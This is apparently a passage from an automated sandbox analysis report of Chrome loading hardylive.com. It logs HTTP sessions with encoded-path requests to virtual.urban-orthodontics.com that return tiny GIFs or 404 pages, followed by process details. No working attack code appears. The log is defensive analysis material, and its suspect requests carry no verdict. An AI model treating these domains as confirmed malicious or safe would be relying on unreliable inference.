                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:03:26 UTC143INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:03:26 GMT
                                                        Content-Type: image/gif
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        2025-03-11 18:03:26 UTC41INData Raw: 32 33 0d 0a 47 49 46 38 37 61 01 00 01 00 80 00 00 fc 6a 6c 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b 0d 0a
                                                        Data Ascii: 23GIF87ajl,D;
                                                        2025-03-11 18:03:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        72192.168.2.449848185.76.79.504435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:03:24 UTC720OUTGET /KAKxe1Mg0hJMIItJHjGdWVt21AsKOJMXSWzVEkZl7ghcY8UICi6TCFwgi0kEIMNZEiDZEUdh2Q5ZZMcUUHvIAUEgzA== HTTP/1.1
                                                        Host: virtual.urban-orthodontics.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Sec-Fetch-Storage-Access: active
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:03:27 UTC143INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:03:27 GMT
                                                        Content-Type: image/gif
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        2025-03-11 18:03:27 UTC41INData Raw: 32 33 0d 0a 47 49 46 38 37 61 01 00 01 00 80 00 00 fc 6a 6c 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b 0d 0a
                                                        Data Ascii: 23GIF87ajl,D;
                                                        2025-03-11 18:03:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        73192.168.2.449849185.76.79.504435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:03:24 UTC708OUTGET /mMawr+Pk08b85IqdrvWcjeuy1d+6/JLD+ajUxvah79zsp8TcuuqS3Ozkipy05MKNouTV3f6y18viq5LS HTTP/1.1
                                                        Host: virtual.urban-orthodontics.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Sec-Fetch-Storage-Access: active
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:03:28 UTC143INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:03:27 GMT
                                                        Content-Type: image/gif
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        2025-03-11 18:03:28 UTC41INData Raw: 32 33 0d 0a 47 49 46 38 37 61 01 00 01 00 80 00 00 fc 6a 6c 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b 0d 0a
                                                        Data Ascii: 23GIF87ajl,D;
                                                        2025-03-11 18:03:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        74192.168.2.449854185.76.79.504435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:03:29 UTC478OUTGET /DMHDyHfjoKFo4/n6OvLv6n+1prgu++Gkba+noWKmnLt4oLe7Lu3hu3jj+fkg47HqNuO5oWCusqtrrLSrLrw= HTTP/1.1
                                                        Host: virtual.urban-orthodontics.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:03:33 UTC165INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:03:32 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        2025-03-11 18:03:33 UTC209INData Raw: 63 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                        Data Ascii: cb<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                                                        2025-03-11 18:03:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        75192.168.2.449855185.76.79.504435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:03:30 UTC486OUTGET /KAKxe1Mg0hJMIItJHjGdWVt21AsKOJMXSWzVEkZl7ghcY8UICi6TCFwgi0kEIMNZEiDZEUdh2Q5ZZMcUUHvIAUEgzA== HTTP/1.1
                                                        Host: virtual.urban-orthodontics.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:03:33 UTC165INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:03:32 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        2025-03-11 18:03:33 UTC209INData Raw: 63 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                        Data Ascii: cb<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                                                        2025-03-11 18:03:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        76192.168.2.449856185.76.79.504435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:03:30 UTC474OUTGET /mMawr+Pk08b85IqdrvWcjeuy1d+6/JLD+ajUxvah79zsp8TcuuqS3Ozkipy05MKNouTV3f6y18viq5LS HTTP/1.1
                                                        Host: virtual.urban-orthodontics.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:03:33 UTC165INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:03:33 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        2025-03-11 18:03:33 UTC209INData Raw: 63 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                        Data Ascii: cb<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                                                        2025-03-11 18:03:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        020406080s020406080100

                                                        Click to jump to process

                                                        020406080s0.0050100MB

                                                        Click to jump to process

                                                        Target ID:1
                                                        Start time:14:02:13
                                                        Start date:11/03/2025
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                        Imagebase:0x7ff786830000
                                                        File size:3'388'000 bytes
                                                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:2
                                                        Start time:14:02:16
                                                        Start date:11/03/2025
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2020,i,13557621258873691069,17181680450178174728,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2060 /prefetch:3
                                                        Imagebase:0x7ff786830000
                                                        File size:3'388'000 bytes
                                                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:4
                                                        Start time:14:02:22
                                                        Start date:11/03/2025
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://hardylive.com"
                                                        Imagebase:0x7ff786830000
                                                        File size:3'388'000 bytes
                                                        MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true
                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                        No disassembly